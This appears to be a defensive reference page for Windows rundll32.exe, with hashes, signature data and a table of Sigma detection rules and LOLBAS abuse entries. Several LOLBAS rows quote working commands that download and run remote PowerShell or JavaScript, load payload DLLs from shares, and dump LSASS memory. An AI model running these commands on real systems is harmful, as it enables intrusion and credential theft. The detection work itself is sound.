rundll32.exe
- File Path: C:\Windows\system32\rundll32.exe
- Description: Windows host process (Rundll32)
Hashes
Type | Hash |
---|---|
MD5 | 44B041922105E01BFD0D096123F7D312 |
SHA1 | 84DDB2B3D1158485B2B66867CA9452930A258EDD |
SHA256 | F1DC9560D0C381C78304D94F7BA469490017D9728A03C2DD32C3BE957FC9F923 |
SHA384 | 825A5C8D7265D3F77D49E270F1D1A0F564C3FF23DC755B8FF86FDE698BF89B0311E28C51A3CE790284B72A342492722A |
SHA512 | F8EC1BAB25EBB3107AAF59CF687E043ABF33A2839B4F5557197472BE18F0AB3788878417E724456BF9D30E237BBA9179AB87803EC410F0F9A5C68631F8F17180 |
SSDEEP | 1536:OM81xna/qB3NhUNfkze1+yWiYcWUoBmtSWRuln5IUmDjoX:l7/o3NhOfk7y7YsdtpRuln5I |
IMP | 4DB27267734D1576D75C991DC70F68AC |
PESHA1 | 0689A2BEDC094FE12F3C0517C0991DD7F842B2C6 |
PE256 | 335ED9EB6223407990A540AA4136E7D75CD41E3A50A016CD746A98FAF967F817 |
Runtime Data
Loaded Modules:
Path |
---|
C:\Windows\System32\combase.dll |
C:\Windows\System32\imagehlp.dll |
C:\Windows\System32\KERNEL32.DLL |
C:\Windows\System32\KERNELBASE.dll |
C:\Windows\System32\msvcrt.dll |
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\System32\RPCRT4.dll |
C:\Windows\system32\rundll32.exe |
C:\Windows\System32\shcore.dll |
C:\Windows\System32\ucrtbase.dll |
Signature
- Status: Signature verified.
- Serial: 3300000266BD1580EFA75CD6D3000000000266
- Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: RUNDLL32.EXE.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/76
- VirusTotal Link: https://www.virustotal.com/gui/file/f1dc9560d0c381c78304d94f7ba469490017d9728a03c2dd32c3be957fc9f923/detection
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of rundll32.exe being misused. While rundll32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | win_invoke_obfuscation_via_rundll_services_security.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | - 'rundll32' | DRL 1.0 |
sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn | DRL 1.0 |
sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | - 'rundll32' | DRL 1.0 |
sigma | win_user_driver_loaded.yml | - '\Windows\System32\rundll32.exe' | DRL 1.0 |
sigma | win_invoke_obfuscation_via_rundll_services.yml | ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' | DRL 1.0 |
sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn | DRL 1.0 |
sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'rundll32' | DRL 1.0 |
sigma | sysmon_susp_powershell_rundll32.yml | title: PowerShell Rundll32 Remote Thread Creation | DRL 1.0 |
sigma | sysmon_susp_powershell_rundll32.yml | description: Detects PowerShell remote thread creation in Rundll32.exe | DRL 1.0 |
sigma | sysmon_susp_powershell_rundll32.yml | TargetImage\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn | DRL 1.0 |
sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'rundll32' | DRL 1.0 |
sigma | file_event_win_creation_system_file.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | file_event_win_susp_clr_logs.yml | - 'rundll32' | DRL 1.0 |
sigma | file_event_win_susp_clr_logs.yml | - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process | DRL 1.0 |
sigma | file_event_win_win_shell_write_susp_directory.yml | # - '\rundll32.exe' | DRL 1.0 |
sigma | image_load_mimikatz_inmemory_detection.yml | Image: 'C:\Windows\System32\rundll32.exe' | DRL 1.0 |
sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | net_connection_win_rundll32_net_connections.yml | title: Rundll32 Internet Connection | DRL 1.0 |
sigma | net_connection_win_rundll32_net_connections.yml | description: Detects a rundll32 that communicates with public IP addresses | DRL 1.0 |
sigma | net_connection_win_rundll32_net_connections.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | posh_pm_invoke_obfuscation_via_rundll.yml | Payload\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' | DRL 1.0 |
sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | Payload\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' | DRL 1.0 |
sigma | posh_ps_invoke_obfuscation_via_rundll.yml | ScriptBlockText\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' | DRL 1.0 |
sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | ScriptBlockText\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' | DRL 1.0 |
sigma | posh_ps_suspicious_keywords.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. | DRL 1.0 |
sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | SourceImage: 'C:\Windows\System32\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_equationgroup_dll_u_load.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'C:\Windows\System32\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_lazarus_loader.yml | - 'rundll32.exe ' | DRL 1.0 |
sigma | proc_creation_win_apt_sofacy.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_taidoor.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_unc2452_cmds.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_unc2452_cmds.yml | ParentImage\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_unc2452_cmds.yml | - 'rundll32 c:\windows\' | DRL 1.0 |
sigma | proc_creation_win_apt_unc2452_ps.yml | - 'rundll32 c:\windows' | DRL 1.0 |
sigma | proc_creation_win_apt_unc2452_ps.yml | - 'process call create "rundll32 c:\windows' | DRL 1.0 |
sigma | proc_creation_win_apt_zxshell.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | CommandLine\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_c3_load_by_rundll32.yml | title: F-Secure C3 Load by Rundll32 | DRL 1.0 |
sigma | proc_creation_win_c3_load_by_rundll32.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | title: CobaltStrike Load by Rundll32 | DRL 1.0 |
sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. | DRL 1.0 |
sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_crime_fireball.yml | description: Detects Archer malware invocation via rundll32 | DRL 1.0 |
sigma | proc_creation_win_crime_fireball.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_html_help_spawn.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_impacket_lateralization.yml | # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe | DRL 1.0 |
sigma | proc_creation_win_invoke_obfuscation_via_rundll.yml | CommandLine\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' | DRL 1.0 |
sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | CommandLine\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' | DRL 1.0 |
sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_malware_notpetya.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_malware_trickbot_wermgr.yml | description: Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe | DRL 1.0 |
sigma | proc_creation_win_malware_trickbot_wermgr.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn | DRL 1.0 |
sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - '*rundll32*' | DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | # - '\rundll32.exe' # see comment below | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | # Several FPs with rundll32.exe - we started excluding specific use cases and | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | # ended commenting out all rundll32.exe sub processes | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | # Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_powershell_dll_execution.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_powershell_dll_execution.yml | - 'Windows-Hostprozess (Rundll32)' | DRL 1.0 |
sigma | proc_creation_win_process_dump_rundll32_comsvcs.yml | title: Process Dump via Rundll32 and Comsvcs.dll | DRL 1.0 |
sigma | proc_creation_win_process_dump_rundll32_comsvcs.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_redmimicry_winnti_proc.yml | - rundll32.exe | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_rundll32_not_from_c_drive.yml | title: Rundll32 From Abnormal Drive | DRL 1.0 |
sigma | proc_creation_win_rundll32_not_from_c_drive.yml | description: Detects rundll32.exe executing from an abnormal drive such as a mounted ISO. | DRL 1.0 |
sigma | proc_creation_win_rundll32_not_from_c_drive.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_rundll32_registered_com_objects.yml | title: Rundll32 Registered COM Objects | DRL 1.0 |
sigma | proc_creation_win_rundll32_registered_com_objects.yml | - https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 | DRL 1.0 |
sigma | proc_creation_win_rundll32_registered_com_objects.yml | Image\|endswith: \rundll32.exe | DRL 1.0 |
sigma | proc_creation_win_rundll32_without_parameters.yml | title: Rundll32 Without Parameters | DRL 1.0 |
sigma | proc_creation_win_rundll32_without_parameters.yml | description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module | DRL 1.0 |
sigma | proc_creation_win_rundll32_without_parameters.yml | CommandLine: 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_run_executable_invalid_extension.yml | description: Detects the execution of rundll32 with a command line that doesn't contain a .dll file | DRL 1.0 |
sigma | proc_creation_win_run_executable_invalid_extension.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_shell_spawn_susp_program.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_child_process_as_system_.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_comsvcs_procdump.yml | description: Detects process memory dump via comsvcs.dll and rundll32 | DRL 1.0 |
sigma | proc_creation_win_susp_comsvcs_procdump.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_comsvcs_procdump.yml | OriginalFileName: 'RUNDLL32.EXE' | DRL 1.0 |
sigma | proc_creation_win_susp_control_dll_load.yml | description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits | DRL 1.0 |
sigma | proc_creation_win_susp_control_dll_load.yml | Image\|endswith: '\rundll32.exe ' | DRL 1.0 |
sigma | proc_creation_win_susp_curl_start_combo.yml | - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 | DRL 1.0 |
sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | title: Emotet RunDLL32 Process Creation | DRL 1.0 |
sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL | DRL 1.0 |
sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | - '\tracker.exe' #When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe | DRL 1.0 |
sigma | proc_creation_win_susp_odbcconf.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_pcwutl.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_activity.yml | title: Suspicious Rundll32 Activity | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_activity.yml | description: Detects suspicious process related to rundll32 based on arguments | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_by_ordinal.yml | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_by_ordinal.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | title: Suspicious Rundll32 Invoking Inline VBScript | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | - 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | title: Rundll32 JS RunHTMLApplication Pattern | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_no_params.yml | title: Suspicious Rundll32 Without Any CommandLine Params | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_no_params.yml | description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_no_params.yml | CommandLine\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_script_run.yml | title: Suspicious Rundll32 Script in CommandLine | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_script_run.yml | description: Detects suspicious process related to rundll32 based on arguments | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_script_run.yml | - rundll32 | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | title: Suspicious Rundll32 Setupapi.dll Activity | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | ParentImage\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_sys.yml | title: Suspicious Rundll32 Activity Invoking Sys File | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_sys.yml | description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_sys.yml | CommandLine\|contains: 'rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_shimcache_flush.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | Image\|endswith: \rundll32.exe | DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | CommandLine\|endswith: rundll32.exe | DRL 1.0 |
sigma | proc_creation_win_susp_target_location_shell32.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_webdav_client_execution.yml | description: A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server). | DRL 1.0 |
sigma | proc_creation_win_susp_webdav_client_execution.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | title: Suspicious WMI Execution Using Rundll32 | DRL 1.0 |
sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | description: Detects WMI executing rundll32 | DRL 1.0 |
sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | - 'rundll32' | DRL 1.0 |
sigma | proc_creation_win_system_exe_anomaly.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | registry_event_modify_screensaver_binary_path.yml | - '\rundll32.exe' | DRL 1.0 |
sigma | driver_load_invoke_obfuscation_via_rundll_services.yml | ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' | DRL 1.0 |
sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | title: Invoke-Obfuscation Via Use Rundll32 | DRL 1.0 |
sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts | DRL 1.0 |
sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' | DRL 1.0 |
sigma | win_possible_privilege_escalation_using_rotten_potato.yml | Image\|endswith: '\rundll32.exe' | DRL 1.0 |
LOLBAS | Dfsvc.yml | - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo | |
LOLBAS | Rundll32.yml | Name: Rundll32.exe | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe AllTheThingsx64,EntryPoint | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | |
LOLBAS | Rundll32.yml | - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe -sta {CLSID} | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. | |
LOLBAS | Rundll32.yml | - Path: C:\Windows\System32\rundll32.exe | |
LOLBAS | Rundll32.yml | - Path: C:\Windows\SysWOW64\rundll32.exe | |
LOLBAS | Rundll32.yml | - IOC: Outbount Internet/network connections made from rundll32 | |
LOLBAS | Rundll32.yml | - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | |
LOLBAS | Rundll32.yml | - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md | |
LOLBAS | Rundll32.yml | - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 | |
LOLBAS | Advpack.yml | Description: Utility for installing software and drivers with rundll32.exe | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX test.dll | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe | |
LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | comsvcs.yml | - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" | |
LOLBAS | Dfshim.yml | - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe | |
LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | Ieframe.yml | - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" | |
LOLBAS | Mshtml.yml | - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" | |
LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe | |
LOLBAS | Pcwutl.yml | - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ | |
LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf | |
LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf | |
LOLBAS | Shdocvw.yml | - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" | |
LOLBAS | Shell32.yml | - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll | |
LOLBAS | Shell32.yml | - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe | |
LOLBAS | Shell32.yml | - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" | |
LOLBAS | Syssetup.yml | - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf | |
LOLBAS | Syssetup.yml | - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta | |
LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe | |
LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | |
malware-ioc | misp-dukes-operation-ghost-event.json | "value": "Rundll32 - T1085", | © ESET 2014-2018 |
